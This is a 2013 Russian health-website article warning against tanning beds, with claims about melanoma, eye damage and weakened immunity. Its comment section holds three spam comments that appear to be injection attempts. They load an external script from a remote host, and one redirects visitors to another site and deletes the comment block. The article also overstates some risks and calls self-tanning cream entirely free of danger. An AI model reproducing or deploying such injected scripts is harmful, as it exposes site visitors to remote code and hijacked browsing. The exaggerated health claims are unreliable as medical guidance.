Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Вы ничего не знали о соля...  >>  Вы ничего не знали о соляриях! 3 повода бежать от них!
 
Обратная связь
 

Вы ничего не знали о соляриях! 3 повода бежать от них!

Размер шрифта
19 августа 2013 00:00
  • google_analytics: false
  • Нравится

Всем посетителям солярий придется расплачиваться. И рублями тут не обойдешься. Заплатить придется своим здоровьем!

Вы ничего не знали о соляриях! 3 повода бежать от них!

С недавнего времени в развитых странах посещение солярия запрещено для несовершеннолетних: в Канаде, в Великобритании, во многих штатах США (в том числе, в Калифорнии) и других. Отбросив ханжество и мракобесие, расскажем почему от соляриев надо бежать.

Рак кожи и старость

Концентрированное облучение в солярии вызывает ожоги, преждевременное старение и – самое главное – РАК! Самая опасная из них – меланома. Те, кто начал ходить в солярий до 30 лет, риск меланомы на 75% больше, чем у остальных.

Меланома – это, без преувеличения, один из флагманов в дьявольской флотилии онкологических заболеваний. Первичная опухоль размером со спичечную головку может усеять весь организм метастазами, так что к моменту обнаружению помочь человеку зачастую невозможно.

Почаще вспоминайте об этом, если в голове появляется мысль подзагореть в солярии.

Слепота

Концентрированный ультрафиолетовые лучи очень опасны для глаз. Многие посетители соляриев отказываются от защитных очков (чтобы загар на лице был равномерным), кроме того, эти самые очки во многих заведениях – дешевые и некачественные.

ЗНАЙТЕ! Кожа век слишком тонкая (по сути – прозрачная) и не может защитить глаза от лучей. А это значит, что вам практически обеспечены офтальмологические проблемы: фотокератит, ожог сетчатки, опухоли век и радужной оболочки. Все это может привести к полной слепоте!

Воздействие на иммунитет

Посещение солярия приводит к иммуносупрессии, то есть к ослаблению нашей противомикробной защиты. Механизм этого явления связан с подавлением активности ряда иммунных клеток, в том числе кожных T-лимфоцитов. Поэтому человек становится более восприимчивым к кожным инфекциям. А инфекциями вы можете заразиться прямо тут же, в солярии. Исследования показывают, что в этих заведениях живут потенциально опасные бактерии, такие как Pseudomonas spp., Bacillus spp., Klebsiella pneumoniae, Enterococcus species, Staphylococcus aureus, Enterobacter cloacae и другие.

Вывод

Мы решительно не находим положительных аспектов в посещении солярия.  Если вы хотите сохранить вашу кожу, глаза, иммунитет и здоровье в целом – откажитесь от этого сомнительнейшего «удовольствия»!

Загар можно получить и другими способами, которые не убьют вас в процессе. Во-первых, это обычный загар на улице, а во-вторых, это кремы с автозагаром. Вы просто мажетесь кремом и все, никаких опасностей!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Иммуномодуляры: мифы и правда   Отдыхаете на пляже, выпиваете? Вот что алкоголь делает с кожей на солнце   Прокол носа – жуткая вещь   Растительное масло спасет от слепоты  
14 июня 2013Рыжий, рыжий, конопатый... А теперь еще и с раком! Ген рыжих волос приводит к раку кожи! Как защититься 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Супереда для вашего иммунитета
Что съесть, чтобы не было рака
Сколько раз в неделю нужно заниматься сексом. Пора наверстывать

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.